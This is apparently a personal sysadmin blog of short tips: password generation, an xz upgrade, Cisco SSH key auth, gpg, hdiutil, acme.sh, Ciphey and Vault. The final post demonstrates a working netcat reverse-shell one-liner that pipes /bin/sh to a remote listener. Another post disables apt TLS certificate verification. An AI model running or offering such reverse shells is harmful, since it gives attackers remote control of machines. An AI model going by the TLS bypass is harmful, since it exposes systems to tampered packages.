Security

pwgen

Little Function for your .zprofle

Demo

# Secure Password Generation
mypwgen() {
  # Complexity labels and corresponding options
  COMPLEXITY_NAMES=("basic" "with-specials" "secure")
  COMPLEXITY_OPTS=("" "-y" "-s")

  # Length and count patterns
  PATTERNS=("8 8" "16 8" "32 8")

  echo
  for i in $(seq 0 $((${#COMPLEXITY_NAMES[@]} - 1))); do
    name="${COMPLEXITY_NAMES[$i]}"
    opts="${COMPLEXITY_OPTS[$i]}"
    echo "### Complexity: $name ###"
    for pattern in "${PATTERNS[@]}"; do
        len=$(echo $pattern | cut -d' ' -f1)
        count=$(echo $pattern | cut -d' ' -f2)

        pwgen $opts $len $count | awk '{ printf "%-32s\n", $0 }' | column
        echo
    done
  done
}
root@yourhost % mypwgen 

### Complexity:  ###
euJuph5u                        	ohthuN2V                        	Xae0Ejoh                        	ViaF6aiw                        
ga0thooM                        	ohra7Koo                        	ouSh1ion                        	Kaif5gah                        

keechaidaipah2Qu                	gu5Eeshivaethi5e                	Shaehee8leeg7tee                	Eij3eyaiNgairooy                
goh2Giesheisuw9a                	Ohmohjook5suizei                	eequ0eeFau4aejie                	eezah3Ie9ai5Ahsh                

aomaegaf2moor3Yei7thaesh1tii0Ohp	aet3uu2oojiroohohPhoh3iJof9upohz	ohph5ooYo2shaeb1ahGh8sheekaek4vo	Aephu9oongee0zah2Phae1gaem7ae7Oo
ehemeinidahWei5ongaipah5eiHah0ae	BeiVae9iZu4iecijaim6OoG0ohheeyei	huThaiShie0pho6sai7dee8eizah6sho	yaeZepuoloaBohrui4iechaiyeiph7Lu

### Complexity: basic ###
El8ohF5x                        	ahgh2Ooc                        	MuoM4eet                        	OhXae1oj                        
joode9Wa                        	yoh4ooY9                        	Eili4ae1                        	kai3EiYo                        

faeViesoog3nouv3                	queifeiG4gatae1b                	aS3shub7Bies5wae                	Eshuameelahmuu0m                
eeth7Bee8Awuj9yi                	yiSoozang1veefoo                	iew2Anahjiwi0Een                	ahkae7gee9vuTeeF                

He1aiXeileo1eiYa0foe2Chophai4uar	uu2ahthi5shouque3Shaing9aejahghe	yireth8ne5mee4geexaiKough8Saepee	ahbie2aethah9ie5shahy3eezathohLa
iu3ohv6ahloo2ae9AotoLeiwahie3sa0	bies5Dahs6hei6sheiboh1ohje6Oot1o	zoh1aiTiethajae6Ire3iex8ci7oorai	Fei7Goh3phiegi9ohr4oonaiyeogh4ph

### Complexity: with-specials ###
Phai'l2j                        	Oobu(fi6                        	Izee"f1x                        	Vien?i7s                        
Ziez~ee0                        	Zei.C4aa                        	ie2Chai(                        	Eem0aik[                        

iG2oe|xeiNg1ophu                	Kop\eiJ3gui2Phoo                	aefah{Y2moh2hieg                	Aegie7phied(oomo                
Lei=thah1bieG]ah                	thaaLoohee_phah8                	saePej2Boo4ahZ@i                	Ugh2pho0oD8ahng)                

ud0ais/eexahqu0paece9am}ah&MoPh6	aingai!No2yoo7iu4eev1eighaiThegh	quoh{ghaeSohbiek_ee:K"ae4ooboiTh	eish]eiR-ev4Og4TuKohwu,a#s4ooGie
ShoomouReSh9oed}iekinuuluchae7Te	eiqua3hair4aeshioL"aLi9bafohx9ee	Ue6avu5quequ<ook{ee*z7iex8fah3ad	vu)Civiremeile6chahg~ehiqu;eihee

Any Comments ?

sha256:

XZ

MacOS

even MacOS seems not hardly affected, better safe than sorry !

# get Version
brew info xz

# Cleanup Cache
brew cleanup -v -s --prune=all

# Downgrade
brew reinstall xz

# Update
brew update

# Upgrade
brew upgrade

# reboot
reboot

# confirm, 5.4.6 should be fine
xz -V

Any Comments ?

sha256: d2d6b0518ee60fc80381a2fb44dee61d06c02a7d4182045ff25d59f4894d1a10

Cisco - SSH Key Auth

Intro

do you wanna login into your cisco switches with ssh & public key. you can build your config easily and copy/paste it to your switch(es).

Set & Check Variables

  • pubkey: read from ~/.ssh/id_rsa.pub
  • username: root
  • password: will be generated. or set it by hand
# get & convert public key
pubkey=$(cat ~/.ssh/id_rsa.pub |cut -d' ' -f 2 |fold -b -w 72)

# Username Switch
username=root

# Password for User
password=$(openssl rand -hex 12)

# Full Line
echo "username $username privilege 15 password $password"

SSH Pubkey Auth Config Snippet

# Build Config
cat  << EOF


############################################
# Copy/Paste to your Cisco Devices - START #
############################################

conf t

# Set Version
ip ssh version 2
no aaa new-model

# Set User
username $username privilege 15 password $password

# Set Key
ip ssh pubkey-chain 
username $username 
key-string
$pubkey
exit
exit
exit

# vty Stuff
line vty 0 15
 login local
 transport input ssh

end
write
exit

############################################
# Copy/Paste to your Cisco Devices - END   #
############################################


EOF

you should test it in a lab environment before running on productiv switches ;)

OpenBSD - gpg

gpg stuff

generate key

gpg --generate-key

change Passphrase

gpg --change-passphrase user-id

import key

gpg --import 92FFBB90C18B59AEF311F9C5D2E39FFEAC507F67.pub.gpg

list key

gpg -k 

sample

root@host # gpg -k 
[keyboxd]
---------
pub   ed25519 2024-01-02 [SC] [expires: 2027-01-01]
      F7118E072D426449DD9E4DE29674836DB8FECEDA
uid           [ultimate] root <root@host>
sub   cv25519 2024-01-02 [E] [expires: 2027-01-01]

encrypt

-r recipient -e encrypt

date > date
gpg -r F7118E072D426449DD9E4DE29674836DB8FECEDA -e date

sample

root@host # gpg -r F7118E072D426449DD9E4DE29674836DB8FECEDA -e date
root@host# ll date*                                                                                                                                                              
-rw-r--r--  1 root  wheel   29 Jan  2 15:14 date
-rw-r--r--  1 root  wheel  200 Jan  2 15:15 date.gpg

root@host# file date*
date:     ASCII text
date.gpg: data

decrypt

-d decrypt

macos - hdiutil

Intro

hdiutil is a command-line utility on macOS that allows users to create, manipulate, and convert disk images. Disk images are virtual disk files that can contain the entire file system structure, including files, folders, and metadata. hdiutil provides a variety of functions related to disk images, and it’s a powerful tool for managing disk-related tasks on a Mac.

Basic Usage

create

echo -n "geheim" |hdiutil create -encryption -stdinpass -size 10m -volname encdata test.dmg -fs HFS+J

mount ro

echo -n "geheim" |hdiutil mount -stdinpass -readonly test.dmg

mount rw

echo -n "geheim" |hdiutil mount -stdinpass test.dmg

create, strong, mount

echo -n "geheim" |hdiutil create -encryption AES-256 -stdinpass -attach -volname encdata -size 10m test.dmg -fs HFS+J

unmount

hdiutil unmount /Volumes/encdata

or

Debian behind TLS Proxy

Behind Corp Proxy

let’s assume you’re behing a Corp Proxy which enforce TLS Inspection, you don’t have the Proxy Cert and you want to Upgrade your Boxes …

… and of course, you do this in the LAB and for Research only and not your Productiv Environment!

TLS Inspection enabled

apt-get upate
W: Failed to fetch https://packages.sury.org/php/dists/bookworm/InRelease  Certificate verification failed: The certificate is NOT trusted.
The certificate issuer is unknown.  Could not handshake: Error in the certificate verification. [IP: xx.xx.xx.xx yyyy]

Disable TLS Check

touch /etc/apt/apt.conf.d/99verify-peer.conf
echo >>/etc/apt/apt.conf.d/99verify-peer.conf "Acquire { https::Verify-Peer false }"

Update

apt-get update
apt-get upgrade

Any Comments ?

sha256: 40c39ed441b4690a8644cd63bfd2e6987f06a70c4f922eca14de5dcc27d4fb35

acme.sh

Certificate Management with ‘acme.sh’

I like to manage my certificates on my own. If you work with Wildcard Certs, acme.sh is a nice and flexible ACME Client, purely written in Shell.

It’s probably the easiest & smartest shell script to automatically issue & renew the free certificates.

Basic Handling

Get Version

acme.sh --version

run it

# acme.sh --version
https://github.com/acmesh-official/acme.sh
v3.0.6

Upgrade Self

are we up2date ?

acme.sh --upgrade

run it

# acme.sh --upgrade
[Mon May  1 11:35:55 CEST 2023] Already uptodate!
[Mon May  1 11:35:55 CEST 2023] Upgrade success!

Info

General Info about the Setup

Ciphey

Ciphey

Fully automated decryption/decoding/cracking tool using natural language processing & artificial intelligence, along with some common sense.

Source: https://github.com/Ciphey/Ciphey

Run in Docker

encoding=$(echo -n "hello world" |base64); docker run -it --rm remnux/ciphey ${encoding}

Result

Possible plaintext: 'hello world' (y/N): y
╭─────────────────────────────────╮
│ Formats used:                   │
│    base64                       │
│    utf8Plaintext: "hello world"╰─────────────────────────────────╯

Supported Ciphers

Ciphey currently supports 51 encryptions, encodings, compression methods, and hashes.

https://github.com/Ciphey/Ciphey/wiki/Supported-Ciphers


Any Comments ?

sha256: a33eac04129d4cf6bedce35c8b38c6f395a68fcf0a3e4ad7285caa6f249de7eb

Hashicorp - Vault

some Hands’on with Hashicorp Vault

Source

https://developer.hashicorp.com/vault/docs/get-started/developer-qs

Install on macos

brew tap hashicorp/tap
brew install hashicorp/tap/vault

Run on Docker

in Background, you have to kill it later

docker run -d -p 8200:8200 -e 'VAULT_DEV_ROOT_TOKEN_ID=dev-only-token' vault
Unseal Key: 2KTIMp0Md52V2xTb0txxxxxxxxxxxxxxxxxxxxxxxxx=
Root Token: dev-only-token

this is a dev instance only and has no persistent data. don’t worry.

Open Browser

  • http://localhost:8200 -> root token

Export in Terminal

export VAULT_ADDR='http://0.0.0.0:8200'
export VAULT_TOKEN="dev-only-token"

Set Key

curl  --header "X-Vault-Token: $VAULT_TOKEN" \
      --header "Content-Type: application/json" \
      --request POST \
      --data '{"data": {"password": "Hashi123"}}' \
      -s http://127.0.0.1:8200/v1/secret/data/my-secret-password

-> Data get’s written to Store …

OpenBSD - ReverseShell

Reverse Shells

Test it

Listen on Host A

Set Lister on Host A (192.168.1.100)

hostA # nc -l 4242

Start Reverse Shell on Host B

hostB # rm /tmp/f; mkfifo /tmp/f; /bin/sh -i 2>&1 </tmp/f |nc 192.168.1.100 4242 >/tmp/f

here we are

hostA # hostname
hostA.somewhere
hostA # nc -l 4242
hostB # hostname
hostB.somewhere

nice ;)


Any Comments ?

sha256: 0a5d01e633e102b0f3e258db89028946a247ef2296eab8dbf8819bc7472779c3